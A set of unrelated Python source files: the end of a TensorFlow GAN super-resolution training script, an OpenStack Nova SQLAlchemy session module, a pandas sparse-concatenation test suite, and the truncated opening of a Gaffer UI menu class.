y0 = from_rgb(layers.downscale2d(x0), stage)
y = y0 + (lod - lod_start) * y
else:
y += from_rgb(layers.downscale2d(x0, 1 << (lod_stop - stage)), stage)
y = conv2d_scaled(y, lfilters[stage], 3, **leaky_relu)
y = layers.space_to_channels(y)
y = conv2d_scaled(y, lfilters[stage - 1], 3, **leaky_relu)
y = tf.concat([y, x0_lores_delta], axis=1)
with tf.variable_scope('stage_0', reuse=tf.AUTO_REUSE):
for x in range(blocks):
y = conv2d_scaled(y, lfilters[0], 3, **leaky_relu)
center = np.ones(lfilters[0], 'f')
center[::2] = -1
center = tf.constant(center, shape=[1, lfilters[0], 1, 1])
return y * center
def model(self, dataset, lod_min, lod_max, lod_start, lod_stop, scale, blocks, filters, filters_min,
wass_target, weight_avg, mse_weight, noise_dim, ttur, total_steps, **kwargs):
assert lod_min == 1
del kwargs
x = tf.placeholder(tf.float32, [None, dataset.colors, dataset.height, dataset.width], 'x')
y = tf.placeholder(tf.float32, [None, dataset.colors, None, None], 'y')
noise = tf.placeholder(tf.float32, [], 'noise')
lod = tf.placeholder(tf.float32, [], 'lod')
lfilters = [max(filters_min, filters >> stage) for stage in range(lod_max + 1)]
disc = functools.partial(self.disc, lod=lod, lod_min=lod_min, lod_start=lod_start, lod_stop=lod_stop,
blocks=blocks, lfilters=lfilters)
sres = functools.partial(self.sres, lod=lod, lod_min=lod_min, lod_start=lod_start, lod_stop=lod_stop,
blocks=blocks, lfilters=lfilters, colors=dataset.colors)
ema = tf.train.ExponentialMovingAverage(decay=weight_avg) if weight_avg > 0 else None
def pad_shape(x):
return [tf.shape(x)[0], noise_dim, tf.shape(x)[2], tf.shape(x)[3]]
def straight_through_round(x, r=127.5 / 4):
xr = tf.round(x * r) / r
return tf.stop_gradient(xr - x) + x
def sres_op(y, noise):
eps = tf.random_normal(pad_shape(y), stddev=noise)
sres_op = sres(tf.concat([y, eps], axis=1), ema=ema)
sres_op = layers.upscale2d(sres_op, 1 << (lod_max - lod_stop))
return sres_op
def tower(x):
lores = self.downscale(x)
real = layers.downscale2d(x, 1 << (lod_max - lod_stop))
if lod_start != lod_stop:
real = layers.blend_resolution(layers.remove_details2d(real), real, lod - lod_start)
eps = tf.random_normal(pad_shape(lores))
fake = sres(tf.concat([lores, tf.zeros_like(eps)], axis=1))
fake_eps = sres(tf.concat([lores, eps], axis=1))
lores_fake = self.downscale(layers.upscale2d(fake, 1 << (lod_max - lod_stop)))
lores_fake_eps = self.downscale(layers.upscale2d(fake_eps, 1 << (lod_max - lod_stop)))
latent_real = disc(real, straight_through_round(tf.abs(lores - lores)))
latent_fake = disc(fake, straight_through_round(tf.abs(lores - lores_fake)))
latent_fake_eps = disc(fake_eps, straight_through_round(tf.abs(lores - lores_fake_eps)))
# Gradient penalty.
mix = tf.random_uniform([tf.shape(real)[0], 1, 1, 1], 0., 1.)
mixed = real + mix * (fake_eps - real)
mixed = layers.upscale2d(mixed, 1 << (lod_max - lod_stop))
mixed_round = straight_through_round(tf.abs(lores - self.downscale(mixed)))
mixdown = layers.downscale2d(mixed, 1 << (lod_max - lod_stop))
grad = tf.gradients(tf.reduce_sum(tf.reduce_mean(disc(mixdown, mixed_round), 1)), [mixed])[0]
grad_norm = tf.sqrt(tf.reduce_mean(tf.square(grad), axis=[1, 2, 3]) + 1e-8)
loss_dreal = -tf.reduce_mean(latent_real)
loss_dfake = tf.reduce_mean(latent_fake_eps)
loss_gfake = -tf.reduce_mean(latent_fake_eps)
loss_gmse = tf.losses.mean_squared_error(latent_real, latent_fake)
loss_gp = 10 * tf.reduce_mean(tf.square(grad_norm - wass_target)) * wass_target ** -2
mse_ema = tf.losses.mean_squared_error(sres(tf.concat([lores, tf.zeros_like(eps)], axis=1), ema=ema), real)
return loss_gmse, loss_gfake, loss_dreal, loss_dfake, loss_gp, mse_ema
loss_gmse, loss_gfake, loss_dreal, loss_dfake, loss_gp, mse_ema = utils.para_mean(tower, x)
loss_disc = loss_dreal + loss_dfake + loss_gp
loss_gen = loss_gfake + mse_weight * loss_gmse
utils.HookReport.log_tensor(loss_dreal, 'dreal')
utils.HookReport.log_tensor(loss_dfake, 'dfake')
utils.HookReport.log_tensor(loss_gp, 'gp')
utils.HookReport.log_tensor(loss_gfake, 'gfake')
utils.HookReport.log_tensor(loss_gmse, 'gmse')
utils.HookReport.log_tensor(tf.sqrt(mse_ema) * 127.5, 'rmse_ema')
utils.HookReport.log_tensor(lod, 'lod')
update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
with tf.control_dependencies(update_ops):
train_d, train_g = [], []
global_arg = dict(global_step=tf.train.get_global_step())
for stage in range(lod_stop + 1):
g_arg = global_arg if stage == 0 else {}
with tf.variable_scope('opt_%d' % stage):
train_d.append(tf.train.AdamOptimizer(FLAGS.lr, 0, 0.99).minimize(
loss_disc * ttur, var_list=utils.model_vars('disc/stage_%d' % stage),
colocate_gradients_with_ops=True))
train_g.append(tf.train.AdamOptimizer(FLAGS.lr, 0, 0.99).minimize(
loss_gen, var_list=utils.model_vars('sres/stage_%d' % stage),
colocate_gradients_with_ops=True, **g_arg))
if ema is not None:
ema_op = ema.apply(tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, 'sres'))
train_op = tf.group(*train_d, *train_g, ema_op)
else:
train_op = tf.group(*train_d, *train_g)
return EasyDict(x=x, y=y, noise=noise, lod=lod, train_op=train_op,
downscale_op=self.downscale(x),
upscale_op=layers.upscale2d(y, self.scale, order=layers.NCHW),
sres_op=sres_op(y, noise),
eval_op=sres_op(self.downscale(x), 0))
def main(argv):
del argv # Unused.
dataset = data.get_dataset(FLAGS.dataset)
schedule = TrainSchedule(2, FLAGS.scale, FLAGS.transition_kimg, FLAGS.training_kimg, FLAGS.total_kimg)
if FLAGS.memtest:
schedule.schedule = schedule.schedule[-2:]
model = LAG(
os.path.join(FLAGS.train_dir, dataset.name),
lr=FLAGS.lr,
batch=FLAGS.batch,
lod_min=1,
scale=FLAGS.scale,
downscaler=FLAGS.downscaler,
blocks=FLAGS.blocks,
filters=FLAGS.filters,
filters_min=FLAGS.filters_min,
mse_weight=FLAGS.mse_weight,
noise_dim=FLAGS.noise_dim,
transition_kimg=FLAGS.transition_kimg,
training_kimg=FLAGS.training_kimg,
ttur=FLAGS.ttur,
wass_target=FLAGS.wass_target,
weight_avg=FLAGS.weight_avg)
if FLAGS.reset:
model.reset_files()
model.train(dataset, schedule)
if __name__ == '__main__':
utils.setup_tf()
flags.DEFINE_integer('blocks', 8, 'Number of residual layers in residual networks.')
flags.DEFINE_integer('filters', 256, 'Filter size of first convolution.')
flags.DEFINE_integer('filters_min', 64, 'Minimum filter size of convolution.')
flags.DEFINE_integer('noise_dim', 64, 'Number of noise dimensions to concat to lores.')
flags.DEFINE_integer('transition_kimg', 2048, 'Number of images during transition (in kimg).')
flags.DEFINE_integer('training_kimg', 2048, 'Number of images during between transitions (in kimg).')
flags.DEFINE_integer('ttur', 4, 'How much faster D is trained.')
flags.DEFINE_float('wass_target', 1, 'Wasserstein gradient penalty target value.')
flags.DEFINE_float('weight_avg', 0.999, 'Weight averaging.')
flags.DEFINE_float('mse_weight', 10, 'Amount of mean square error loss for G.')
flags.DEFINE_bool('reset', False, 'Retrain from the start.')
flags.DEFINE_bool('memtest', False, 'Test if the parameters fit in memory (start at last stage).')
FLAGS.set_default('batch', 16)
FLAGS.set_default('lr', 0.001)
FLAGS.set_default('total_kimg', 0)
app.run(main)
|
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Session Handling for SQLAlchemy backend."""
import re
import time
from sqlalchemy.exc import DisconnectionError, OperationalError
import sqlalchemy.interfaces
import sqlalchemy.orm
from sqlalchemy.pool import NullPool, StaticPool
import nova.exception
import nova.flags as flags
import nova.openstack.common.log as logging
FLAGS = flags.FLAGS
LOG = logging.getLogger(__name__)
_ENGINE = None
_MAKER = None
def get_session(autocommit=True, expire_on_commit=False):
"""Return a SQLAlchemy session."""
global _MAKER
if _MAKER is None:
engine = get_engine()
_MAKER = get_maker(engine, autocommit, expire_on_commit)
session = _MAKER()
session.query = nova.exception.wrap_db_error(session.query)
session.flush = nova.exception.wrap_db_error(session.flush)
return session
def synchronous_switch_listener(dbapi_conn, connection_rec):
"""Switch sqlite connections to non-synchronous mode"""
dbapi_conn.execute("PRAGMA synchronous = OFF")
def add_regexp_listener(dbapi_con, con_record):
"""Add REGEXP function to sqlite connections."""
def regexp(expr, item):
reg = re.compile(expr)
return reg.search(unicode(item)) is not None
dbapi_con.create_function('regexp', 2, regexp)
def ping_listener(dbapi_conn, connection_rec, connection_proxy):
"""
Ensures that MySQL connections checked out of the
pool are alive.
Borrowed from:
http://groups.google.com/group/sqlalchemy/msg/a4ce563d802c929f
"""
try:
dbapi_conn.cursor().execute('select 1')
except dbapi_conn.OperationalError, ex:
if ex.args[0] in (2006, 2013, 2014, 2045, 2055):
LOG.warn('Got mysql server has gone away: %s', ex)
raise DisconnectionError("Database server went away")
else:
raise
def is_db_connection_error(args):
"""Return True if error in connecting to db."""
# NOTE(adam_g): This is currently MySQL specific and needs to be extended
# to support Postgres and others.
conn_err_codes = ('2002', '2003', '2006')
for err_code in conn_err_codes:
if args.find(err_code) != -1:
return True
return False
def get_engine():
"""Return a SQLAlchemy engine."""
global _ENGINE
if _ENGINE is None:
connection_dict = sqlalchemy.engine.url.make_url(FLAGS.sql_connection)
engine_args = {
"pool_recycle": FLAGS.sql_idle_timeout,
"echo": False,
'convert_unicode': True,
}
# Map our SQL debug level to SQLAlchemy's options
if FLAGS.sql_connection_debug >= 100:
engine_args['echo'] = 'debug'
elif FLAGS.sql_connection_debug >= 50:
engine_args['echo'] = True
if "sqlite" in connection_dict.drivername:
engine_args["poolclass"] = NullPool
if FLAGS.sql_connection == "sqlite://":
engine_args["poolclass"] = StaticPool
engine_args["connect_args"] = {'check_same_thread': False}
_ENGINE = sqlalchemy.create_engine(FLAGS.sql_connection, **engine_args)
if 'mysql' in connection_dict.drivername:
sqlalchemy.event.listen(_ENGINE, 'checkout', ping_listener)
elif "sqlite" in connection_dict.drivername:
if not FLAGS.sqlite_synchronous:
sqlalchemy.event.listen(_ENGINE, 'connect',
synchronous_switch_listener)
sqlalchemy.event.listen(_ENGINE, 'connect', add_regexp_listener)
if (FLAGS.sql_connection_trace and
_ENGINE.dialect.dbapi.__name__ == 'MySQLdb'):
import MySQLdb.cursors
_do_query = debug_mysql_do_query()
setattr(MySQLdb.cursors.BaseCursor, '_do_query', _do_query)
try:
_ENGINE.connect()
except OperationalError, e:
if not is_db_connection_error(e.args[0]):
raise
remaining = FLAGS.sql_max_retries
if remaining == -1:
remaining = 'infinite'
while True:
msg = _('SQL connection failed. %s attempts left.')
LOG.warn(msg % remaining)
if remaining != 'infinite':
remaining -= 1
time.sleep(FLAGS.sql_retry_interval)
try:
_ENGINE.connect()
break
except OperationalError, e:
if (remaining != 'infinite' and remaining == 0) or \
not is_db_connection_error(e.args[0]):
raise
return _ENGINE
def get_maker(engine, autocommit=True, expire_on_commit=False):
"""Return a SQLAlchemy sessionmaker using the given engine."""
return sqlalchemy.orm.sessionmaker(bind=engine,
autocommit=autocommit,
expire_on_commit=expire_on_commit)
def debug_mysql_do_query():
"""Return a debug version of MySQLdb.cursors._do_query"""
import MySQLdb.cursors
import traceback
old_mysql_do_query = MySQLdb.cursors.BaseCursor._do_query
def _do_query(self, q):
stack = ''
for file, line, method, function in traceback.extract_stack():
# exclude various common things from trace
if file.endswith('session.py') and method == '_do_query':
continue
if file.endswith('api.py') and method == 'wrapper':
continue
if file.endswith('utils.py') and method == '_inner':
continue
if file.endswith('exception.py') and method == '_wrap':
continue
# nova/db/api is just a wrapper around nova/db/sqlalchemy/api
if file.endswith('nova/db/api.py'):
continue
# only trace inside nova
index = file.rfind('nova')
if index == -1:
continue
stack += "File:%s:%s Method:%s() Line:%s | " \
% (file[index:], line, method, function)
# strip trailing " | " from stack
if stack:
stack = stack[:-3]
qq = "%s /* %s */" % (q, stack)
else:
qq = q
old_mysql_do_query(self, qq)
# return the new _do_query method
return _do_query
|
|
# pylint: disable-msg=E1101,W0612
import itertools
import numpy as np
import pytest
from pandas.errors import PerformanceWarning
import pandas as pd
import pandas.util.testing as tm
class TestSparseArrayConcat(object):
@pytest.mark.parametrize('kind', ['integer', 'block'])
def test_basic(self, kind):
a = pd.SparseArray([1, 0, 0, 2], kind=kind)
b = pd.SparseArray([1, 0, 2, 2], kind=kind)
result = pd.SparseArray._concat_same_type([a, b])
# Can't make any assertions about the sparse index itself
# since we aren't don't merge sparse blocs across arrays
# in to_concat
expected = np.array([1, 2, 1, 2, 2], dtype='int64')
tm.assert_numpy_array_equal(result.sp_values, expected)
assert result.kind == kind
@pytest.mark.parametrize('kind', ['integer', 'block'])
def test_uses_first_kind(self, kind):
other = 'integer' if kind == 'block' else 'block'
a = pd.SparseArray([1, 0, 0, 2], kind=kind)
b = pd.SparseArray([1, 0, 2, 2], kind=other)
result = pd.SparseArray._concat_same_type([a, b])
expected = np.array([1, 2, 1, 2, 2], dtype='int64')
tm.assert_numpy_array_equal(result.sp_values, expected)
assert result.kind == kind
class TestSparseSeriesConcat(object):
@pytest.mark.parametrize('kind', [
'integer',
'block',
])
def test_concat(self, kind):
val1 = np.array([1, 2, np.nan, np.nan, 0, np.nan])
val2 = np.array([3, np.nan, 4, 0, 0])
sparse1 = pd.SparseSeries(val1, name='x', kind=kind)
sparse2 = pd.SparseSeries(val2, name='y', kind=kind)
res = pd.concat([sparse1, sparse2])
exp = pd.concat([pd.Series(val1), pd.Series(val2)])
exp = pd.SparseSeries(exp, kind=kind)
tm.assert_sp_series_equal(res, exp, consolidate_block_indices=True)
sparse1 = pd.SparseSeries(val1, fill_value=0, name='x', kind=kind)
sparse2 = pd.SparseSeries(val2, fill_value=0, name='y', kind=kind)
res = pd.concat([sparse1, sparse2])
exp = pd.concat([pd.Series(val1), pd.Series(val2)])
exp = pd.SparseSeries(exp, fill_value=0, kind=kind)
tm.assert_sp_series_equal(res, exp, consolidate_block_indices=True)
def test_concat_axis1(self):
val1 = np.array([1, 2, np.nan, np.nan, 0, np.nan])
val2 = np.array([3, np.nan, 4, 0, 0])
sparse1 = pd.SparseSeries(val1, name='x')
sparse2 = pd.SparseSeries(val2, name='y')
res = pd.concat([sparse1, sparse2], axis=1)
exp = pd.concat([pd.Series(val1, name='x'),
pd.Series(val2, name='y')], axis=1)
exp = pd.SparseDataFrame(exp)
tm.assert_sp_frame_equal(res, exp, consolidate_block_indices=True)
def test_concat_different_fill(self):
val1 = np.array([1, 2, np.nan, np.nan, 0, np.nan])
val2 = np.array([3, np.nan, 4, 0, 0])
for kind in ['integer', 'block']:
sparse1 = pd.SparseSeries(val1, name='x', kind=kind)
sparse2 = pd.SparseSeries(val2, name='y', kind=kind, fill_value=0)
with tm.assert_produces_warning(PerformanceWarning):
res = pd.concat([sparse1, sparse2])
exp = pd.concat([pd.Series(val1), pd.Series(val2)])
exp = pd.SparseSeries(exp, kind=kind)
tm.assert_sp_series_equal(res, exp)
with tm.assert_produces_warning(PerformanceWarning):
res = pd.concat([sparse2, sparse1])
exp = pd.concat([pd.Series(val2), pd.Series(val1)])
exp = pd.SparseSeries(exp, kind=kind, fill_value=0)
tm.assert_sp_series_equal(res, exp)
def test_concat_axis1_different_fill(self):
val1 = np.array([1, 2, np.nan, np.nan, 0, np.nan])
val2 = np.array([3, np.nan, 4, 0, 0])
sparse1 = pd.SparseSeries(val1, name='x')
sparse2 = pd.SparseSeries(val2, name='y', fill_value=0)
res = pd.concat([sparse1, sparse2], axis=1)
exp = pd.concat([pd.Series(val1, name='x'),
pd.Series(val2, name='y')], axis=1)
assert isinstance(res, pd.SparseDataFrame)
tm.assert_frame_equal(res.to_dense(), exp)
def test_concat_different_kind(self):
val1 = np.array([1, 2, np.nan, np.nan, 0, np.nan])
val2 = np.array([3, np.nan, 4, 0, 0])
sparse1 = pd.SparseSeries(val1, name='x', kind='integer')
sparse2 = pd.SparseSeries(val2, name='y', kind='block')
res = pd.concat([sparse1, sparse2])
exp = pd.concat([pd.Series(val1), pd.Series(val2)])
exp = pd.SparseSeries(exp, kind=sparse1.kind)
tm.assert_sp_series_equal(res, exp)
res = pd.concat([sparse2, sparse1])
exp = pd.concat([pd.Series(val2), pd.Series(val1)])
exp = pd.SparseSeries(exp, kind=sparse2.kind)
tm.assert_sp_series_equal(res, exp, consolidate_block_indices=True)
@pytest.mark.parametrize('kind', [
'integer',
'block',
])
def test_concat_sparse_dense(self, kind):
# use first input's fill_value
val1 = np.array([1, 2, np.nan, np.nan, 0, np.nan])
val2 = np.array([3, np.nan, 4, 0, 0])
sparse = pd.SparseSeries(val1, name='x', kind=kind)
dense = pd.Series(val2, name='y')
res = pd.concat([sparse, dense])
exp = pd.SparseSeries(pd.concat([pd.Series(val1), dense]), kind=kind)
tm.assert_sp_series_equal(res, exp)
res = pd.concat([dense, sparse, dense])
exp = pd.concat([dense, pd.Series(val1), dense])
# XXX: changed from SparseSeries to Series[sparse]
exp = pd.Series(
pd.SparseArray(exp, kind=kind),
index=exp.index,
name=exp.name,
)
tm.assert_series_equal(res, exp)
sparse = pd.SparseSeries(val1, name='x', kind=kind, fill_value=0)
dense = pd.Series(val2, name='y')
res = pd.concat([sparse, dense])
# XXX: changed from SparseSeries to Series[sparse]
exp = pd.concat([pd.Series(val1), dense])
exp = pd.Series(
pd.SparseArray(exp, kind=kind, fill_value=0),
index=exp.index,
name=exp.name,
)
tm.assert_series_equal(res, exp)
res = pd.concat([dense, sparse, dense])
exp = pd.concat([dense, pd.Series(val1), dense])
# XXX: changed from SparseSeries to Series[sparse]
exp = pd.Series(
pd.SparseArray(exp, kind=kind, fill_value=0),
index=exp.index,
name=exp.name,
)
tm.assert_series_equal(res, exp)
class TestSparseDataFrameConcat(object):
def setup_method(self, method):
self.dense1 = pd.DataFrame({'A': [0., 1., 2., np.nan],
'B': [0., 0., 0., 0.],
'C': [np.nan, np.nan, np.nan, np.nan],
'D': [1., 2., 3., 4.]})
self.dense2 = pd.DataFrame({'A': [5., 6., 7., 8.],
'B': [np.nan, 0., 7., 8.],
'C': [5., 6., np.nan, np.nan],
'D': [np.nan, np.nan, np.nan, np.nan]})
self.dense3 = pd.DataFrame({'E': [5., 6., 7., 8.],
'F': [np.nan, 0., 7., 8.],
'G': [5., 6., np.nan, np.nan],
'H': [np.nan, np.nan, np.nan, np.nan]})
def test_concat(self):
# fill_value = np.nan
sparse = self.dense1.to_sparse()
sparse2 = self.dense2.to_sparse()
res = pd.concat([sparse, sparse])
exp = pd.concat([self.dense1, self.dense1]).to_sparse()
tm.assert_sp_frame_equal(res, exp, consolidate_block_indices=True)
res = pd.concat([sparse2, sparse2])
exp = pd.concat([self.dense2, self.dense2]).to_sparse()
tm.assert_sp_frame_equal(res, exp, consolidate_block_indices=True)
res = pd.concat([sparse, sparse2])
exp = pd.concat([self.dense1, self.dense2]).to_sparse()
tm.assert_sp_frame_equal(res, exp, consolidate_block_indices=True)
res = pd.concat([sparse2, sparse])
exp = pd.concat([self.dense2, self.dense1]).to_sparse()
tm.assert_sp_frame_equal(res, exp, consolidate_block_indices=True)
# fill_value = 0
sparse = self.dense1.to_sparse(fill_value=0)
sparse2 = self.dense2.to_sparse(fill_value=0)
res = pd.concat([sparse, sparse])
exp = pd.concat([self.dense1, self.dense1]).to_sparse(fill_value=0)
exp._default_fill_value = np.nan
tm.assert_sp_frame_equal(res, exp, consolidate_block_indices=True)
res = pd.concat([sparse2, sparse2])
exp = pd.concat([self.dense2, self.dense2]).to_sparse(fill_value=0)
exp._default_fill_value = np.nan
tm.assert_sp_frame_equal(res, exp, consolidate_block_indices=True)
res = pd.concat([sparse, sparse2])
exp = pd.concat([self.dense1, self.dense2]).to_sparse(fill_value=0)
exp._default_fill_value = np.nan
tm.assert_sp_frame_equal(res, exp, consolidate_block_indices=True)
res = pd.concat([sparse2, sparse])
exp = pd.concat([self.dense2, self.dense1]).to_sparse(fill_value=0)
exp._default_fill_value = np.nan
tm.assert_sp_frame_equal(res, exp, consolidate_block_indices=True)
def test_concat_different_fill_value(self):
# 1st fill_value will be used
sparse = self.dense1.to_sparse()
sparse2 = self.dense2.to_sparse(fill_value=0)
with tm.assert_produces_warning(PerformanceWarning):
res = pd.concat([sparse, sparse2])
exp = pd.concat([self.dense1, self.dense2]).to_sparse()
tm.assert_sp_frame_equal(res, exp, consolidate_block_indices=True)
with tm.assert_produces_warning(PerformanceWarning):
res = pd.concat([sparse2, sparse])
exp = pd.concat([self.dense2, self.dense1]).to_sparse(fill_value=0)
exp._default_fill_value = np.nan
tm.assert_sp_frame_equal(res, exp, consolidate_block_indices=True)
def test_concat_different_columns_sort_warns(self):
sparse = self.dense1.to_sparse()
sparse3 = self.dense3.to_sparse()
with tm.assert_produces_warning(FutureWarning):
res = pd.concat([sparse, sparse3])
with tm.assert_produces_warning(FutureWarning):
exp = pd.concat([self.dense1, self.dense3])
exp = exp.to_sparse()
tm.assert_sp_frame_equal(res, exp, check_kind=False)
def test_concat_different_columns(self):
# fill_value = np.nan
sparse = self.dense1.to_sparse()
sparse3 = self.dense3.to_sparse()
res = pd.concat([sparse, sparse3], sort=True)
exp = pd.concat([self.dense1, self.dense3], sort=True).to_sparse()
tm.assert_sp_frame_equal(res, exp, check_kind=False)
res = pd.concat([sparse3, sparse], sort=True)
exp = pd.concat([self.dense3, self.dense1], sort=True).to_sparse()
exp._default_fill_value = np.nan
tm.assert_sp_frame_equal(res, exp, check_kind=False)
def test_concat_bug(self):
from pandas.core.sparse.api import SparseDtype
x = pd.SparseDataFrame({"A": pd.SparseArray([np.nan, np.nan],
fill_value=0)})
y = pd.SparseDataFrame({"B": []})
res = pd.concat([x, y], sort=False)[['A']]
exp = pd.DataFrame({"A": pd.SparseArray([np.nan, np.nan],
dtype=SparseDtype(float, 0))})
tm.assert_frame_equal(res, exp)
def test_concat_different_columns_buggy(self):
sparse = self.dense1.to_sparse(fill_value=0)
sparse3 = self.dense3.to_sparse(fill_value=0)
res = pd.concat([sparse, sparse3], sort=True)
exp = (pd.concat([self.dense1, self.dense3], sort=True)
.to_sparse(fill_value=0))
exp._default_fill_value = np.nan
tm.assert_sp_frame_equal(res, exp, check_kind=False,
consolidate_block_indices=True)
res = pd.concat([sparse3, sparse], sort=True)
exp = (pd.concat([self.dense3, self.dense1], sort=True)
.to_sparse(fill_value=0))
exp._default_fill_value = np.nan
tm.assert_sp_frame_equal(res, exp, check_kind=False,
consolidate_block_indices=True)
# different fill values
sparse = self.dense1.to_sparse()
sparse3 = self.dense3.to_sparse(fill_value=0)
# each columns keeps its fill_value, thus compare in dense
res = pd.concat([sparse, sparse3], sort=True)
exp = pd.concat([self.dense1, self.dense3], sort=True)
assert isinstance(res, pd.SparseDataFrame)
tm.assert_frame_equal(res.to_dense(), exp)
res = pd.concat([sparse3, sparse], sort=True)
exp = pd.concat([self.dense3, self.dense1], sort=True)
assert isinstance(res, pd.SparseDataFrame)
tm.assert_frame_equal(res.to_dense(), exp)
def test_concat_series(self):
# fill_value = np.nan
sparse = self.dense1.to_sparse()
sparse2 = self.dense2.to_sparse()
for col in ['A', 'D']:
res = pd.concat([sparse, sparse2[col]])
exp = pd.concat([self.dense1, self.dense2[col]]).to_sparse()
tm.assert_sp_frame_equal(res, exp, check_kind=False)
res = pd.concat([sparse2[col], sparse])
exp = pd.concat([self.dense2[col], self.dense1]).to_sparse()
tm.assert_sp_frame_equal(res, exp, check_kind=False)
# fill_value = 0
sparse = self.dense1.to_sparse(fill_value=0)
sparse2 = self.dense2.to_sparse(fill_value=0)
for col in ['C', 'D']:
res = pd.concat([sparse, sparse2[col]])
exp = pd.concat([self.dense1,
self.dense2[col]]).to_sparse(fill_value=0)
exp._default_fill_value = np.nan
tm.assert_sp_frame_equal(res, exp, check_kind=False,
consolidate_block_indices=True)
res = pd.concat([sparse2[col], sparse])
exp = pd.concat([self.dense2[col],
self.dense1]).to_sparse(fill_value=0)
exp['C'] = res['C']
exp._default_fill_value = np.nan
tm.assert_sp_frame_equal(res, exp, consolidate_block_indices=True,
check_kind=False)
def test_concat_axis1(self):
# fill_value = np.nan
sparse = self.dense1.to_sparse()
sparse3 = self.dense3.to_sparse()
res = pd.concat([sparse, sparse3], axis=1)
exp = pd.concat([self.dense1, self.dense3], axis=1).to_sparse()
tm.assert_sp_frame_equal(res, exp)
res = pd.concat([sparse3, sparse], axis=1)
exp = pd.concat([self.dense3, self.dense1], axis=1).to_sparse()
exp._default_fill_value = np.nan
tm.assert_sp_frame_equal(res, exp)
# fill_value = 0
sparse = self.dense1.to_sparse(fill_value=0)
sparse3 = self.dense3.to_sparse(fill_value=0)
res = pd.concat([sparse, sparse3], axis=1)
exp = pd.concat([self.dense1, self.dense3],
axis=1).to_sparse(fill_value=0)
exp._default_fill_value = np.nan
tm.assert_sp_frame_equal(res, exp)
res = pd.concat([sparse3, sparse], axis=1)
exp = pd.concat([self.dense3, self.dense1],
axis=1).to_sparse(fill_value=0)
exp._default_fill_value = np.nan
tm.assert_sp_frame_equal(res, exp)
# different fill values
sparse = self.dense1.to_sparse()
sparse3 = self.dense3.to_sparse(fill_value=0)
# each columns keeps its fill_value, thus compare in dense
res = pd.concat([sparse, sparse3], axis=1)
exp = pd.concat([self.dense1, self.dense3], axis=1)
assert isinstance(res, pd.SparseDataFrame)
tm.assert_frame_equal(res.to_dense(), exp)
res = pd.concat([sparse3, sparse], axis=1)
exp = pd.concat([self.dense3, self.dense1], axis=1)
assert isinstance(res, pd.SparseDataFrame)
tm.assert_frame_equal(res.to_dense(), exp)
@pytest.mark.parametrize('fill_value,sparse_idx,dense_idx',
itertools.product([None, 0, 1, np.nan],
[0, 1],
[1, 0]))
def test_concat_sparse_dense_rows(self, fill_value, sparse_idx, dense_idx):
frames = [self.dense1, self.dense2]
sparse_frame = [frames[dense_idx],
frames[sparse_idx].to_sparse(fill_value=fill_value)]
dense_frame = [frames[dense_idx], frames[sparse_idx]]
# This will try both directions sparse + dense and dense + sparse
for _ in range(2):
res = pd.concat(sparse_frame)
exp = pd.concat(dense_frame)
assert isinstance(res, pd.SparseDataFrame)
tm.assert_frame_equal(res.to_dense(), exp)
sparse_frame = sparse_frame[::-1]
dense_frame = dense_frame[::-1]
@pytest.mark.parametrize('fill_value,sparse_idx,dense_idx',
itertools.product([None, 0, 1, np.nan],
[0, 1],
[1, 0]))
@pytest.mark.xfail(reason="The iloc fails and I can't make expected",
strict=False)
def test_concat_sparse_dense_cols(self, fill_value, sparse_idx, dense_idx):
# See GH16874, GH18914 and #18686 for why this should be a DataFrame
from pandas.core.dtypes.common import is_sparse
frames = [self.dense1, self.dense3]
sparse_frame = [frames[dense_idx],
frames[sparse_idx].to_sparse(fill_value=fill_value)]
dense_frame = [frames[dense_idx], frames[sparse_idx]]
# This will try both directions sparse + dense and dense + sparse
for _ in range(2):
res = pd.concat(sparse_frame, axis=1)
exp = pd.concat(dense_frame, axis=1)
cols = [i for (i, x) in enumerate(res.dtypes) if is_sparse(x)]
for col in cols:
exp.iloc[:, col] = exp.iloc[:, col].astype("Sparse")
for column in frames[dense_idx].columns:
if dense_idx == sparse_idx:
tm.assert_frame_equal(res[column], exp[column])
else:
tm.assert_series_equal(res[column], exp[column])
tm.assert_frame_equal(res, exp)
sparse_frame = sparse_frame[::-1]
dense_frame = dense_frame[::-1]
|
|
##########################################################################
#
# Copyright (c) 2013-2014, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import functools
import IECore
import Gaffer
import GafferUI
class MultiSelectionMenu( GafferUI.MenuButton ) :
def __init__(
self,
allowMultipleSelection = False,
allowEmptySelection = True,
**kw
) :
